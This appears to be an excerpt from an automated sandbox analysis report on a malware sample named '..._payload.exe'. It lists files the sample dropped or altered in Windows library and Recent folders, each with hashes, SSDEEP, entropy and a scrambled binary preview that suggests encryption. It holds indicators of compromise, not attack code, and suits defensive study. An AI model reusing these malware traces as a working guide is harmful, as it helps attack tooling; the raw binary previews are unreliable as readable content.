                                                                                                                                                                      Preview:<?xml.i}XG3.....x..........:-...@~...,..b....|...y..C.x.95..a...............i8.y.....97.[B..x.E7[.^. !X.0...u.@....i........_.....u.../...W../'......2....[]./..E.....C.......0.S..qe..s..G5w.Na....Y~.........iV.8.(Kx.c......\..U.......uO....d.....,..*..i..'8..N..S|..... .'.W ...../b.;.............qU.YW03z..{R....~...=n...5..6..8...*...x....;...^Su....Y.m....k.y.F...{tJm...5.'b.o$t.(0....H_....e..?..)..WG.].d4....X.$..J...J_....3R.w...,.&...B.1..uo5.....^.>.....6..4..G<.........x.e6JY.5.....+..E.9....v.....Q..G'.>c...|.[..x.AF..jB..-.I^hd..w...&..xQ.~.\P@0......I.=*.......(%..*......M>L...9|;.#.g..~3,.-...F_t.E...qt'5.............G.9.....U....)_i.....M.....C.q..N..2.S..]F..g... R._)...C`..++.......q..lrg.a.D..}.$.k.?.*k.d.. U.m.lrg....q...{..r.~-.DaU...Hj.=Qn.7.....Y.7..+....-..!.Q.q$...B.R...33i.?....V{.../U.........D;..<.P.>`............d!g.....(F.3$.%.....N<.ez..C).ue.5.TE.X..](K.^.YWG.....\.....`...x@T.).=.."|f.......O5."..R.HM.2C>.......

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Music.library-ms

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2381
                                                                                                                                                                      Entropy (8bit):7.9254174691554
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:M4oO/KUmCuiETk//L0skAbiI26nuTb9kAaIHna6aXSTLL3a8vGwsWmVoBD:oOhmCuHTk//PkAp69kAaIHnaNiTzGzWt
                                                                                                                                                                      MD5:ACFA99D1477C3D2AFE327E88B7E611A8
                                                                                                                                                                      SHA1:23FCCC1B5EAD7D281C870417F8EBE6B130DD7F51
                                                                                                                                                                      SHA-256:FCE42D3A6C658B5B28F8709C33BB31A40E6D4DE91147AA71FD99CC9930652AE0
                                                                                                                                                                      SHA-512:6491702A7D9AC5E42FB68597A6787C04B885FBB179ACF5069C45734B2A832B3EB7281C6F4A9E0C4F2BFF2C036319DBFF5C5BDAC1941E29D4CB37DDD33F39C059
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.........nF......4...Db.e.n.".....*.n....[.).5E...).u......S..)....N...0.&..n'5Ht..b.s........@ .J... .">.{...[.8.4j.....m........$.B.[.5L..h/...`d.u.>+.....e...3...qF.......~.y.{2....?L(....x>.0.R.....kL..-J.zK3&"..|<>*..K...$....r....N.F..rp......!.c.D.".MEZb.7.i:....~3Wp1.Odm{v....(u5..m."Z.../.....j.|...NC9}|*..10.\..o.7:..BoO....A3R.....%d....B..rl.F ..R.S*...G.T..V...m.w..$..j.xH..-x..K<K]Vi.......d.r.lZ..x'..bPi...d.k...+N....n....=....l..O).8..|.QJl...&..V..lt..._.......py......N0r..W.)..& ...!....(Q.....;..0..[K....1!....u.&#*......MI....=...-...d.C.K..7.*!..t$\.....,,l...{..So CH...3.#7d...v3v'Y....",...d.p.Y.....&r]j...H.;0.B.<.8..M.F...6q.+...c.9'B.}|."......D.....,....w6..XmT.......f[.........*"q.. .....c...u@....|.S..aX,..Q....W..|.:-1.!QxO...s..(>.=.e..r_.V.-K..:pe"|.;A.dU5..j;....v..M0&a8.x.N(...}n..+.W.V....62.=....?......;|{9$.......b.uP-IY....".X.L..[..../.!.......-..[K..G..d..+...Sw...(g.......#G..d..r.......P.P.c

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Pictures.library-ms

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2398
                                                                                                                                                                      Entropy (8bit):7.931587966854671
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:PdokLp/O/2+EHPpbkF9ExrvNm6kH87/cwV68iIcf+QgSG23416gD:nV62+EHPpbkF9EJV8H87Yhf+Q1G234d
                                                                                                                                                                      MD5:BE03FC87B7C0FAC3653D9B318B75661D
                                                                                                                                                                      SHA1:2124E053CA9E4C4D4CE93706AC72111BD2A1300F
                                                                                                                                                                      SHA-256:35B56979CEE810848DE125F0488B728C36AF774143005D2AD76F0CFFA49AE043
                                                                                                                                                                      SHA-512:57D20B11640827985DAC58CE67871D7DECE91A5EDDB33353187A681E518A62DEC71FE312BBD1CF45E72B50303E096900E19D96E4DCD7444DE638B49BC8D9762D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmly.5./.....-+.#.Q..r5..Q..m...j..y.c=....;....{._..'.?. .Lw...|..0..1........2-Z..u.n.%....3G...A..{[.f.......7+..r.<.....+e..9..;...d/..TcDS[..@(.G%..c.........O.a.....8._.WC...u"..z%.B......T. b......y.:.d.i..S......a.^.@..S.._.~.U.`.\.g.r...y...`MFliDj.$@.....y..O.J.....iI..\..q+...N...;.1.\.....i(!...h>.D....4/.........o|.....0...puzm.z...8..[4.h...2q.LZV.,......Jf.K...W.Br....K.v.6=N.....>.pG*..i....v=I.....}:.K)#.y<r..}.4.L.....S.Y..&..*<j.L..U.%.....;.8'...(IP.v..\........g.qB.c<r...fV.9<....4.1..]..L....E.s.......:....fR9.<.T...r..........UB.nv......|.t........+....c.,._..u..'..[..~...O\..|.F..c.3./..i....32.K.Q...%.X.....A7{.j.p....tD..`Ip.[.....d*....Y....ZQ=..(..x|?2....0|....{`...IT..-.t.N....h.&.b.@..I..#T.yT...2...>L......7.....n..J/..'I.$.tw.....+.+V#T...C.q5 -...Cr+.!`.>c....K6.XAt.f.#d5..B..X..m..nX..,.h........S.O....e\k}..Kj -......T..S......O2..B..#-x.d..+.\...a.2<.G..J..>%ZS..t5o.;;......H./r....3pX.^.3.......n.

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\SavedPictures.library-ms

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1358
                                                                                                                                                                      Entropy (8bit):7.853821842836099
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:YpXk8aByx8oLYvO4tYHVi5pRaUkqw6sdID1ntRe3KJtKJuRGPlrL9vxT2bD:Q7rx8outsJGDttJttqlHAD
                                                                                                                                                                      MD5:989F43ED90DD2ED5067CD3C017C7BF27
                                                                                                                                                                      SHA1:4F38467F6EED06F71D1C0AE30BBF1BC46504017C
                                                                                                                                                                      SHA-256:F9848C2752C80F2A05C361DCA5E72759FF04BB8417D602FA5DAACE092EE180AE
                                                                                                                                                                      SHA-512:FBD4F3E6D984D4CF7A0A97A6A916001C627AB38D38CA78AC82B790A6EAB98628F4302005E632CAC6912BEC12DEF8F53F0746E6538FCD539AF1417FAEFC1F03EB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...|..I#z. ....6}|.%.~..o.s6.k.&......d...c..H.Y.).z...M.:E....S.......9y7.......?|.M.O:...=.\g........Y1...f>7...O.;Y5Y9....l....j.>w..(......#.h.)....+...?-q..2.J.w....L...Rv..b.` H...3.|..rdXf9..f}.#..+E4.mz.~..4......$..c...8...b.O....n..)jc..)Ep"..sP...H....i?.D..1..Ot.B.$.b.T.Z.....7#%.oB...YY...*&.R..F...Q.f....B.0a#..e].;7...</.M.G6...D.G(.$Zn.$,..<.f..3fw........dwW...).>D....'.([..V.&.?..q4...>.%PG.<..q:.<......~.?y3z-.Q...ov...e..MAV.l^.s.......U?o......b.V.A........+Q.N.R.]...=k.. ..I..u|....."....b...7.A...+.6.0Cv(..,^.>w....T.=.?...E..Z..^..I...QP.e.....ja.{...c..]...w..J.O......o2Q..*.n6.|}..^PR....`4...O:.L.......e.[.\....gs......ZB...=.wu. ..-m.c;..i}.o.<E& .0RS.*e......{......?.|[&.cob.\.6..6.x.u9Gi.[..- c....$...Z..Uo.@DAM.$E........:8..Y.4..V2...c..$..M.......M...m...3.....%TnH...e...A..=....V.{Yj..~Y.....*}!...M..fH*..).b.7.F......{.%......S.QH.."..ab...9.....6...h....\H}...Z..C.,{T.....q.2b..\.wXZ.........{.WJb.

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Videos.library-ms

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2409
                                                                                                                                                                      Entropy (8bit):7.906571854420374
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:5d1+LwHWl3yhD7JuFqeMjTTWTG5GKj6HoKmOcILg3+mpZCYxzSmvwD:5U1eEFUnTWpIxILg3NpZCYc7
                                                                                                                                                                      MD5:3B03D0B18A03B9B6F2B09E9124AFDA23
                                                                                                                                                                      SHA1:4821C376F44BF13DDA9B84B34FA7BF8BA28DF32E
                                                                                                                                                                      SHA-256:068069201C71F59B89068C6AAE60B9FA3E270F81622C7256C24580615A31D328
                                                                                                                                                                      SHA-512:BD4040CC3B78CD211B5DB375004B324930C1195BEB9951954EF1C39F1E484F315FD53B7A3CFD0ED5743659A6DC09E9A39A4ABBB2EC573B0121AC9599DE1AC10A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.%.'.hKq.n.JR.>..^.q..s....sq2.....?Q.Dm....b...R`.....F...G8.....8.......m..!i......*....kq..q.l..;6..o.f..~>.|ug..y.J..J. ..`.}....}.....$...HW.v)X.V......|s......XQ.W.G.....0\..d....z..<..4.R#...Jv..&f......K(....3..d.`.|N...$.....}...h......O.i.E.\b..o..0...H.Lj..&..O....Z.....v.E.,...U...U.L.u..3&..`..A.2$.....v.I.x.R.n.X8#.1.}...L..<|..!....P....".{.D..+d1D.D..6.0...v...!.~.W ....Q./J*......k....e.j.....S..a../...................2...qgjPi..$L.x!....-.u....O.`g.y.p..(-=Pm.5BX.Zf}.fm.{.....u......3F..N.~......>.l..........D...f.P...-.L_.}....Dq.:.v.i.a...%...7..v.[9...[.....*...R....B.V3..Pv8.....U34-..`.........Y...^...]..k.b.=x...;7`...dg..hc.Zzh.g;...|7N.,..D.8....t....[D6vq\.L..z^....#..e.T....Z.4L..O+.&..m6.....G..U90..].y..83.s..T..]..#..Y........|.M<o.|..........M...c...EL........y.....P..d.#.....\.6.:+A..G.F...h...c.B...*..Tl.9....K..N..gM.<..g....V.....B...^..#....|...4..f.J1...E.*.....|...H6.-......S$D.Z..dm.#|Qb.@.n.0.o....

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ANHVHMGQLM.mp3

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.861384421941496
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:EQlbBD3wOMfZriTVokQtz2Uw62PCN/udvocHHbwx9JZTt/TS9tuJoEN7T2bD:BzDg7ulQtKUlt/uvocnboT5tVN7AD
                                                                                                                                                                      MD5:81161F3D475DF99F9A32EC39673283AB
                                                                                                                                                                      SHA1:83E185A515C938EFF7408D83B2E91A5F5B6FE686
                                                                                                                                                                      SHA-256:EA73C3978D11457D46243B13CB3A4C91363D831BD78BE27AFD8BE38D96E92FF8
                                                                                                                                                                      SHA-512:6196D47C84F3CD7312038993EF828CAD6110C42DA496C8F951142AC2C667B46593F00AB83E6C0F198C9BAC790622F9D4AF8D62D0F2C360BFA33D7DD99D5210C7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:ANHVH.{kc.t<\.i...B6.u..).<.d.G..L........%...g..V.<.P..X.2..a.........O?.T[R.$...........B..Z1.TgIld.$..E..Oq....X.*u.+.<...a".TVJ.#k.^.aX..d.k......Jf2....\<..[.S..6S......\s...Q...m..?...........x}/..0..D7.+..N....L....=N..0....&W..Se.eq.=.. b~)x.U.x...A.!....._.........:........u......jk.2.>J_.....|....[.'.........\.Q.c`.u|..N.`..~tq.!b...V.....m.q..}.1_..Xo....XJ..rW...d....2(..>3j..C..?....;.|U.z.o8Dc.6.:%J.J....M.$..W.L........=V.......p.(........p.#..N.k.....m.O.7.9M.G..F}.2m....5(}9..J..a...W...r.....WJ{.~...L2.......oK ...R....0k.a:.]}.w..u28K...H1............:.0..F....3......B.#:v.Oz3.Xj.K.p.0..._.Kk.$...?..B..yV.8.V.O..$K...&....9.C6...)9..'..._........|\i...3.:S...u.~1j.......e...T...AD....O..+....Dr..=W.v.v.............@@e.nJy..j....rc$R..n(nU...6.......s.......W..Q..2..^0....h....<........zG."..K/.\O..n..!.......\....S.u.........b]/.l...pWR.u..t....)\.8C^..<..,`..ia.O...^F.h..pf.x...|R.x.....Y=-.o...*..Td..)^..X:j....

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AZTRJHKCVR.jpg

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.857644803274317
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:PZ1UY88fCRo9EuZnpQrBOyMiG7FVnhi91ehe4l1hrmM8Fa3rsk7ktXH2bD:B1+LR3unCgx/n80fh58FmpkSD
                                                                                                                                                                      MD5:2DD10E474A2E838E54FCA13562F55E0F
                                                                                                                                                                      SHA1:915CC8C3AF5B31B2E3FFF59DCF581D7A0592D9DB
                                                                                                                                                                      SHA-256:97D9C790ABFC1715F66005E4F7AF1D0CF119A60347BF2577CEC5BB1204765023
                                                                                                                                                                      SHA-512:47407BD85AD5858486187215B8DEA74F3BFAA8013F850E39EA2CF07EBB161E7D6375A8AA35EB997C6CC9FCC8A144733008B9EEA3584609DE7776AFE9A765F65C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:AZTRJ.....X(.?m...-.V..?C.^.i.I.`.X...X..DZ.B...3...n.A.d.i.v.Nq..=,....U.....2....6.}..Y@....v.o>...#&o..j.<(..HG.>.)[...........F.......O~+......f.F..)j....6S.wb]<6.1.....) ..i...<..P...CQ.0M..p..`T....B.}.*.xk.....<}C.*y....P...$j.B-...4.../W)_....Dr|3.+:..J..ch.....0...]..Gw.2...(.KQ.lW.O.V...N.=..`..%.1....'._..:..P..Y.)..[..'.O...jk.g.8.<..v...wCi3uB..t......x@...@.H.)q[s.}.m^X...Gl.0..9.X.r.'$..&rb..@.T.b...X...9..q.m>A2.....W.|.....z...a...r.#..Uy...T.y.!z..X.3.I.y.L.8.q..6.d.+..S`...........5.|.L4x..0J)`N.>d...ut.%.)..9.f.>z.I....@.~.a"f..F:.......h...S....v.i.....X...zf.R.)...vb...R......[.`..o....Z....F..Xt]:.^,.).n.UpFA..F......l..~..@...2...NR.a....1/..:.)....s.W.@......B..KY...a.."..~.HP.......tL c.T......)'*..2...fS...FP.+sU...o~..W.........o.\..../...K.bfu.N.f.U.Sk.t.TE......t....T......~)w.k.\....w.....I|/..n.....`rr..A....%w._`gX1.a....@TU../...qu....2. e.>n.y..w.......w`.........WB.....J..Y.h..3.v..5.2M`B.....<..<.!bQ_.7.-..aIb

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AZTRJHKCVR.mp3

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.849647420372744
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:RG0SudM9YqIvkn5QOf8zg7UVvfYcY6obOJgD4cvDa/9tLTK7cNw2bD:HNapWmae8zQUxYcY/TccvotvKoxD
                                                                                                                                                                      MD5:F58F6FF0FC3BF1873665C66373F5C7B6
                                                                                                                                                                      SHA1:09472E35014418C480A614F111B5DCF4D3CB2BC2
                                                                                                                                                                      SHA-256:7AFB9FB7F23963703B6B2E62D9CEDBBDE8FD323334C0AD2812C6DAC7924242E9
                                                                                                                                                                      SHA-512:253106F4F7A041A730017916F26B44612F6D2C860358EA4A86C585FF607A79D43FEB03F493DC4449FBFDAC91F5ABDA062FD1CBB3919FDE71D88D7015414233C4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:AZTRJ.4.q...Q-...$8]ug.YE.v1Fk#b...n8.8..I..U..[..`.<.\.A....7.?....J.CEN....O.l..\..p..t.....l.....{........m.d..{.....^s....Z.9...,..&...yq.....!...V...oe@...m..~5.2.Jy.....l.}..~.*.LA.j@.D,....s..7c...OT..{.........eb.uC.a{C#.>.....Ax.......m....[...g..R.......|....W.x,t.&...)..u.W....@=.D...a.5cD#.....-..P7F%.*b...'.BZ=...D..~b...l....y...Ic.No.~.gY.N.&..-S..Cq..(@..O.....n`..K.8:W..2.....i...9..|..G.P.&=.{'. ._!?.....%V.1.!.\=..siu....+.p...@duZ2..(S..G..Y....`...btd.m.[xR...Q1.e...7..\...@[#._.8M....m8..fJ&c#..O.0]..z..Z...G......dG8T.Ux.......L!b.9..P..t..5.. V...(..3...}...Y.N.R.F....w.....o;SsZS)8..,!_...b....v.....j...Q9.C.j.TE..Y....P.f...E.aK..7U..=....m.d....d....?......../Asn=.t.~..)uy...4..?.I.L1....#.....i./.....>.c6..9...x.-.N....Ts.W.2...3......X..I..UD]...M....&..]$..^n$k......~..zA.1%...7./Q.X..8....%X..o...D.y.%E}.R.RB.....^.....P.......G.Ra...6.=}.....*..%9.]...9.C....~B./...>#`..i...W)...e.....7.N.

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AZTRJHKCVR.pdf

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.855213670731229
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:RfgG4Ge4njSq2wjA6D9NgZsZQzORdN+9ij0ToOI3wSN5DBjw3p126UUsYgrfQiVk:RYQeixfAG46ZQy7QG0TtI3wm5DB4aLUL
                                                                                                                                                                      MD5:934D7666A4997C98E2C4729CEA39E9C2
                                                                                                                                                                      SHA1:DC53A9124323F10E23124C530718872E6AC04826
                                                                                                                                                                      SHA-256:F0C77B323226D8FD6ACFF80EE5DEDD3C9FAE31D84FCF75EC66114EB92B1171EF
                                                                                                                                                                      SHA-512:4C15F5C889B5E1F243DBA061392517075F3627045125D6F68AB42D2FBAD8DDDF72535A4A4008919794D4BBB5602EDB50B437B48C93F2D9FA5C18843DA7CEA7BF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:AZTRJtb.W</I:.?t{.{yIe...fu.:..a.!.a....p...5.>.yS.^X=... ...T...x.0.Z.$.%.&t~.i?.....;XE.JbJ.....Y.9.D...|b.c.Ye.\l.(..5~...k..azy.@..z{..M-..T...!...7.p.%..... .X."Q@.....n...P}..Z.....8\j.5.>z...7.....7..5?...d.....h)...].....*..f.j..Bj.)..Z.I~.............9....vG.......uD....W...X~\}....XH....!..\`S..4.2...p..X.\6.......9.@y..=...fr.l[.w.D...y..J...}v .s...{>...*.X.>B..>."M6..$`1.R...J.?.......H...).4.39..{N.& 9..,n.x...p..<.N....g.......]T.t<..4[RA.J..H0ZvD.i.EAk.^e~.5M.K.UM`..l.)c.}...........{.\+{....R....H.Lx.hM......nQ.......?._X....I......v.L..t.$..Z,A.N..D`Z.3.d..2.......k[K...'P.f..>?.7...5.`.....5.......W..@8...4...3|VY...l'A.[.G}.t..9..6_...|4...5..6......tT.Fmc.....k$.._=...)l....j..u.b.....Xq$5.Y..]8..j.L........E*.N.E....Qc......G..j..~...PC6....1.t..%...O.....9.*..4.......1. ..7.n......t..#..d.b.U...0.w..,<..J%./Xvb..now....{.....].i_......./..7.) ..#.k..'L..>..G..2...E.......D...l$..k.v....`+m..g..."..!C%.;{...q&...A.;.

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BPMLNOBVSB.jpg

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.866589585133114
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:l//7RHLxmg8Rjc5yv+kjyWIFqXvd/0r5P8PLVrA3Gkq4A4x4eV2bD:l/Vrx5rpkxJ/6lP8J8p2fD
                                                                                                                                                                      MD5:E5377059892CF64C8B80EF36F35C3513
                                                                                                                                                                      SHA1:B8C86E2BFB913CC1E8A14BB0BDC479DDD81F9EE2
                                                                                                                                                                      SHA-256:557062B298EE2C38ABD9950D86BE3344D39164412DA5DDB78E17641033E7E14A
                                                                                                                                                                      SHA-512:C41BBAA2035F8215A1FBB57EFF8EC91A8F4E9F8EAE302452D3A3739A5940C28EFC717C6E197B0E5299AC1E980D2B881D5D1215A6AA5A2A1288593EE818E193C5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:BPMLN..|.g.#&.uq.G#....Q`.3.'...=`i..dg'.}..g:.Yn...,/...`5......z.}&r..6n....5....../.T...7...r.+..7b.[ha.......*....q0Yj.[...y2....)..f......q.>(....8Vl_......E.U..kl.Q;.. XL2./.1.8..k.0..N.........#..H..h.2.0x._t...g.........._.Y...`........^..........<.U:..;.&47..4...b.5b}"....O...G ..a}...'.R...B.w..g@....|......yf|u.PBo6~.xC.*.R.C6.=....A.....;.1...tbI".".'...RS.;Nk. \.ju....v.].......@..%W.e.....=s."...G^..b?.<m#....VMq.&..:%.@..h..pG.r^..).......k..T..ve..G:V...C_.....\........%.../Qo..C(..,bd..|....3.Z...>s3-s0.0JJ.>o.._.O....(...*...F..k.......y~.?.....8..C..(E&dI["0c.....e6coe..w...<P.{.;N....b.......pd..w.Q.[.=..z0..r.".(.Ky;.#E..yr...d.T...|C+\.*_..=.v.~..qN.....^gL](.....N............c[}s._.......o...M.y.E..d.+.v.nR....z..6U{.?._B.u....P!.Z......mU$.5].V.}..7wW.i.@.`.&.]....E...ba.}.A..1.....Y.....r..2<.....".G....!....G#..dy..h.=;".Q.[.$@..g..^.A..?..4>..1...-u..7.............v:H....1.N.@!1..?..|.#.>..\... "...gE.o.F....w

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CULUOHOPZT.mp3

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.827457872276762
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:3guTfUInW6ZQLWPvUI85auvr/I1G9Llf0HjML2AnvdNwfOhT2bD:3guwOVh0I81vrw1u0HodvgrD
                                                                                                                                                                      MD5:9E24E12F70B98ECAFDCB4C226B416338
                                                                                                                                                                      SHA1:08EA82A1A64D608C3E6D6E236F2B49B4C81121B7
                                                                                                                                                                      SHA-256:E34BEB612EFA72C53B80468627B8B9538FD8752AD8E78E7CA8F4D16A0F3077CD
                                                                                                                                                                      SHA-512:07AD6C7316AB07832CE547A207BE530EFE9C5B4B0CFD1D16F5575B5A1B5FE17D03881574D5841C193BCF4978680842E27A638B50485873A56E92633CC7ADBAB4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:CULUO.h=M. .7..o....E.=:!.g.RSZ&vy.r.Wt.....d........>,.R. ...._..%0x.....(V;....9..^.7..^W.6..}.GV._&.....p....[0./G..b.....e:w>.x...X....:.&R.........z...{pL..2...5,'..{..n.5.ZU....\.+WnCZ.d.q..,...."\.<..T.i.4.Py.p.A.V........E...z.8\.(.?..1...Fa...T9.y'V.P.J.y.'..J.X..0}0.Q.8.l.p.......Q.....9..s..J...Cj.<l....\zE".\.O:.9.@.}......H.1..T.mIBw....}q....Q.J.........;ov.#..o....VYv<.a...ob......:....,W.....[7....~..?..x..........c..]..\...L.P...0..x].-]..&...kd-d..qCbQ.....)...I.Z.....s:..\ ......$..^.?..;--...Q..[...<....H9<.....;.{...Pc..Gi.....kE.:.+..c...ny[k....D....S....y..z.Y.V^7j.x..y.......U....u`9{....|.{.D-.....m..h.)6..^#..!bQ...%+....5..",.J..s.FG.M...M.."...TW.ww,......x........t..s<G..TG.....t.G.Ic-<..).2. ..W.m.d..t........z..>...@.;3..|.m.<.p...;->..7.'\|.O...FV.. W...#O......k...iRjh..F?.ky.=i........!/.b...fE...EW..s.....b.Q.6'-i........S^l...zh...W.j..E...u.%.s......2.TA..S$.AG...}v.L...WU..).o...G)|w.L....B).U.T.r.

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DQOFHVHTMG.jpg

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.866417280022411
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:9yITJeI70HLCBpErZb+AeUDDxHi0S1+yC8AUI6CJTLiP65FU0fr042bD:9yITbkLjeH7C8fCJTLiC5SBD
                                                                                                                                                                      MD5:306DF649CAC4335A7F0F92621F9A0BFB
                                                                                                                                                                      SHA1:6966E2AFEFE066F90930ECC06A65E56E23ABD8F0
                                                                                                                                                                      SHA-256:E199C107BCB3B70A8ABCC33AAC05ADCD9456D4240F653857A27488F7F2D3C039
                                                                                                                                                                      SHA-512:6526CAD20B97CBEDA904AAC8AC30BA32DDA96EF8199BDDD2CD50AED981EEE269A4B1877FEAA80ACEA4FBA94AFC799F51CCE4804D66A80308903A1220AF7DA792
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:DQOFHJ)....so...k4....T=....3..h......[.|.E....!...un..o.C...>$f.$|..i.d..2c.[..T.....J.6i.A...P......./.W.g.{.-...9O.....:9../.'.l.S....m0*..Hg,...v.. ..P..to...,.:.p.y.1...U..O.q@.4.S...Y..uKw....).....O*z.D.g..L;{.N>.Qm.=..u,lJ8e.T..........B....F1@;4.....x.80..u...43G......4O.....k.'}...).NP._.K.'.B.p.....%7i...^..V..c..Si..".......N..2..K~..Q.#~...7...*......V._..+U.........~13B..8q..L*....;.........I.Pml..k...{..y..+|.D...&.J@.`.;...k%.0.Hqq@<C...U..Q.;`..m..JST)....X.v.s.@'....=....*W..(........H..`.....?u..H.4k..l.,B.....]CBn>...j.F.%....q..vVW.l.S.BW[.q...|..&....d..M.|...k. w......B}B>..^.................#]z.....Q...x....O.. ^{....C..;nS...c.q..I...,....iK.d.N.*.\P*..EXZ#3...a...hN...R..K.o!.[.o....0..`._HN....^{Jf.).v.....jv!.LU.M{.+.......}...KF.m`7$}.V..2.d......d`&.py.......'./;..T[0../t..n.....X&_&.[..1c.xXRHe._.C.....kt...l...Gl?:b..(!..GT.f?..=..E.....$.U..B..8.?B.r.i@...Z9.\6....9r}.T;J.g...5.......8eh|....Lw..^..C.j.....{H....

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DQOFHVHTMG.xlsx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.860151179216443
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:Yo0+qMOhhkbKfoA36PLgGcjWBj0pwXiY6g3KYwEKikRFrpCY0B+9gK1WftyI2bD:YoqhhUPLVqWBj0OXR6g3KYjKlTpCYhD
                                                                                                                                                                      MD5:208018ADE71CBE8C3B2B60B96BDBB279
                                                                                                                                                                      SHA1:2D161CF12B5758F3777A1D844C4BDA085B5ABB1C
